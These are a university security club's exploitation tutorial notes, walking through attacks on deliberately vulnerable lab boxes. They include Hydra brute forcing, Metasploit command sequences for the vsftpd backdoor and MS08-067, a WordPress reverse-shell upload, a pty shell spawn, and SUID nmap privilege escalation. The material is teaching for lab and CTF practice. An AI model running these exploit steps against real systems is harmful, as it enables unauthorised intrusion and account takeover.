Exploitation1

9 minute read

To get on mailing list: goo.gl/HjJW7u
To log into WiFi: auctf / !!auctf2016

Contact info: v@auburn.edu - Jeramy
mr@auburn.edu - Matthew
jss0040@auburn.edu - Jacob

Going to try something new so no slides; only this.
There are a couple competition related things happening this week – the NSA Codebreakers 2016 challenges started last Friday (09/09)(it’s an excellent start into learning about reverse engineering and runs until December), and CSAW CTF starts this Friday (09/16), which is one of the bigger collegiate undergrad competitions.

First Exploitation Meeting

Now that we’ve scanned the network and learned how nmap works, we can leverage this knowledge in order to find and attack vulnerable boxes. This meeting will go over the most basic for of exploitation - brute forcing. We’ll also touch on basic user enumeration through services, and then apply all of these steps towards breaking into a box from Vulnhub.

Start with Scanning

First we’ll need to see what boxes are alive on the network. Running nmap with the -sP flag should give a quick ping sweep of what’s going on the network, which should look approx. like this:

~# nmap -sP 10.0.1.1-21
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-09-13 10:26 EDT
Nmap scan report for 10.0.1.1
Host is up (0.0053s latency).
...
Nmap scan report for 10.0.1.15
Host is up (0.0055s latency).
Nmap scan report for 10.0.1.16
Host is up (0.0057s latency).
Nmap scan report for 10.0.1.17
Host is up (0.0056s latency).
Nmap scan report for 10.0.1.18
Host is up (0.0056s latency).
Nmap scan report for 10.0.1.19
Host is up (0.0058s latency).
Nmap scan report for 10.0.1.20
Host is up (0.0057s latency).
Nmap scan report for 10.0.1.21
Host is up (0.0057s latency).
Nmap done: 21 IP addresses (21 hosts up) scanned in 28.08 seconds

The boxes we actually care about (spoiler alert) are in the range from 10.0.1.17-10.0.1.21. Due to time constraints we’ll just scan these 5. We can use nmap or zenmap to get a quick overview of what each of these boxes are doing.

~# nmap -A -vv 10.0.1.17-21  
~# zenmap

I won’t post the results here since they’re pretty hefty.

User enumeration

User enumeration is the act of testing or finding usernames, in order to get a foothold into a box. This can be testing usernames in a login form on a website or by abusing services like snmp. “Finger” was one of the first protocols made for getting user status over a network, and while not widely used today, can easily be abused if found.

The earlier nmap output shows that 10.0.1.17 is running the finger daemon, as well as an ftp server.

PORT      STATE  SERVICE      VERSION
21/tcp    open   ftp          vsftpd 3.0.2
79/tcp    open   finger       Debian fingerd

If we look into this further, we can use finger to get the currently logged in users.

~# finger @10.0.1.17
Login     Name       Tty      Idle  Login Time   Office     Office Phone
clean     clean     *tty2        2  Sep 12 15:42
ftpuser   ftpuser   *tty1    18:09  Sep 12 15:41 3130      
guest               *tty3        2  Sep 13 09:49

Brute Forcing

Now that we know some potential users, we can try and leverage these to get access to the box. The simplest, yet usually least effective and time consuming way of doing this is through brute forcing.

10.0.1.17 is also running an ftp server on port 21, we can see that it has an ftpuser. We can try bruteforcing the password to see if it is simple enough to crack in a reasonable amount of time.

Hydra is the go-to tool for network logon cracking and supports a number of different services, so let’s give it a shot.

~# gunzip -d /usr/share/wordlists/rockyou.txt.gz
~# hydra -l ftpuser -P /usr/share/wordlists/rockyou.txt ftp://10.0.1.17
    
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-13 10:56:30
[DATA] max 16 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~14008 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 10.0.1.17   login: ftpuser   password: [redacted]
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-13 10:57:19

Now that took less than a minute because I purposefully chose a password early in the wordlist. This isn’t that representative of true bruteforcing which can take forever (literally), like if we were cracking stronger passwords and hashes.

Web Enumeration

Many of the servers we enumerated earlier were running webservers on port 80. Due to misconfigurations or vulnerabilties in the services used, we can use these as potential attack vectors in order to get into the box. Let’s start with 10.0.1.20.

If we can go to 10.0.1.20 in our browser, we can see that it’s running something called UltimateLAMP which is a purposefully vulnerable / test LAMP (Linux - Apache - MySQL - PHP) server running a million different services, like wordpress.

Knowing that this is running a ton of services, checking for things like injections, xss, or cves in each service could take forever so let’s let robots do it for us. Nikto is a vulnerability scanner (similar to Nessus) that scans web servers for known vulnerabilities.

~# nikto -h http://10.0.1.20
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.0.1.20
+ Target Hostname:    10.0.1.20
+ Target Port:        80
+ Start Time:         2016-09-13 11:05:50 (GMT-4)
---------------------------------------------------------------------------
[tons of vulns here]
+ 8347 requests: 2 error(s) and 40 item(s) reported on remote host
+ End Time:           2016-09-13 11:11:14 (GMT-4) (101 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

As you can see, there are a million different vulnerabilities, so we’ll have to move onto more specific tools like wpscan, but we’ll look at those later.

Armitage and Metasploit

The Metasploit Framework is the largest open-source framework for developing and executing exploits. Msfconsole and Armitage are the most well-known front-ends for MSF (cli and gui respectively), and will be what we use. Today we’ll focus on Armitage, since using msfconsole is very involved.

First we need to get all the hosts we’re interested in by click Hosts in the top left and adding new ones. We’ll stay with 10.0.1.17-21 to keep it simple. In msfconsole we would type:

msf > hosts --add 10.0.1.17-21

Now we need to rescan them in order to add services to our msf database. This is easy in armitage, you can either right click an individual host and press scan, or go to the top left Hosts menu again and choose an nmap scan. To do an intense scan with host-discovery in msfconsole:

msf > db_nmap -T4 -A -n -v 10.0.1.17-21

Finding attacks is easy as pressing the attacks menu in the top left and then “Find Attacks” and waiting for the loading bar. Make sure that you’ve checked every port and service or you might miss some. Keep in mind there will be a lot of false positives and negatives. It’s just the nature of the game.

We’ll start with 10.0.1.19 which is a Linux box called Metasploitable2, which is a purposefully vulnerable box to test metasploit exploits on. We’ll start with an ftp backdoor in an previous version of the ftp service we bruteforced earlier. Right click the box corresponding to 10.0.1.19 > attack > ftp > vsftod_234_backdoor. A bunch of commands should run at the bottom, and you’ll have a shell by right-clicking the box again and going to Shell > interact. That easy. msfconsole equivalent:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set TARGET 0
msf exploit(vsftpd_234_backdoor) > set PAYLOAD cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > set LHOST <ip>
msf exploit(vsftpd_234_backdoor) > set LPORT 27526
msf exploit(vsftpd_234_backdoor) > set RPORT 21
msf exploit(vsftpd_234_backdoor) > set RHOST 10.0.1.19
msf exploit(vsftpd_234_backdoor) > exploit -j

Similarly, we can look at a classic vulnerability in Windows XP / Server 2003: MS08_067 which is a wormable RCE vulnerability in SMB. This was the vulnerability that the Conficker worm used, and was later utilized by Stuxnet.

In the same fashion, all we need to do is right click the box and select the attack: /exploit/windows/smb/ms08_067_netapi. msfconsole equivalent:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set TARGET 0
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set LHOST <ip>
msf exploit(ms08_067_netapi) > set LPORT 27675
msf exploit(ms08_067_netapi) > set RPORT 445
msf exploit(ms08_067_netapi) > set RHOST 10.0.1.21
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
msf exploit(ms08_067_netapi) > exploit -j

Bringing it all Together and Adding Complexity

Now we’ll run through a scenario from Vulnhub, an online community for posting vulnerable virtual machine “challenges” where you attempt to get root on a box designed to have specific vulnerabilities (Boot2Root). This one happens to be Mr. Robot themed, and the goal is to find 3 “flags” like we would if we were competing in a CTF competition.

The ip address we’ll focus is 10.0.1.18.

We can use our earlier nmap results to see that the only thing running on the box is a web server on ports 80 and 443. Let’s boot up nikto and see if there are any glaring vulnerabilities. Similar to earlier, we’ll run.

~# nikto -h http://10.0.1.18

The output verifies that this is a wordpress site, and that there is a robots.txt file, which is a file that good-mannered bots check to see where they shouldn’t go. The first flag is located there, along with a .dic file that might come in handy later.

Now we can run wpscan - a more specific wordpress vulnerability scanner. It doesn’t look like there are any RCE vulnerabilties, but we can probably upload a reverse shell if we get the password for a user. We can use the login form to find valid users, like “elliot” and then brute force the password with WPScan. Sadly this will take 4-5 hours. So the password is ER28-0652. This is more representative of actual brute forcing.

~# wpscan -u 10.0.1.18 -e vp

Now let’s load the host up into Armitage and try and upload a reverse shell using /exploit/unix/webapp/wp_admin_shell_upload. Sadly it appears that there is an error when checking if wordpress exists, but I’m pretty sure this is a wordpress blog so let’s check it out.

~# nano -c /usr/share/metasploit-framework/modules/exploits/unix/webapp/wp_admin_shell_upload.rb

Add a comment (#) to line 69 - fail_with(Failure:: … ) unless wordpress_and_online?

Now reload the module rerun the exploit using the previously gained username and password and a reverse shell. You should get in. You should get dropped into a shell and be able to ‘ls’ the robot home directory. Sadly we can’t access the flag in there, but we do have a password file containing an md5 hash of the password. We could crack it, or we could just google it.

Now we have an account that can access the second flag, but no shell. So we need to use python to spawn one.

~# python -c 'import pty;pty.spawn("/bin/bash")'
~# su robot

Now you can read the second flag, but the third one, located in the /root/ folder requires a root account to access, so we need to look for some sort of privilege escalation. We need a file that runs as root that we can run commands on so let’s look around.

~# find / -perm -u=s -type f 2>/dev/null

That should look at all the files owned by root that we can run, you’ll notice that nmap is in there. Through some research you’ll see that nmap has an interactive mode that can run bash commands so the rest should be easy.

~# nmap --interactive
nmap > !sh
nmap > id

Now you can get the final flag. Woo. Writeup Credit.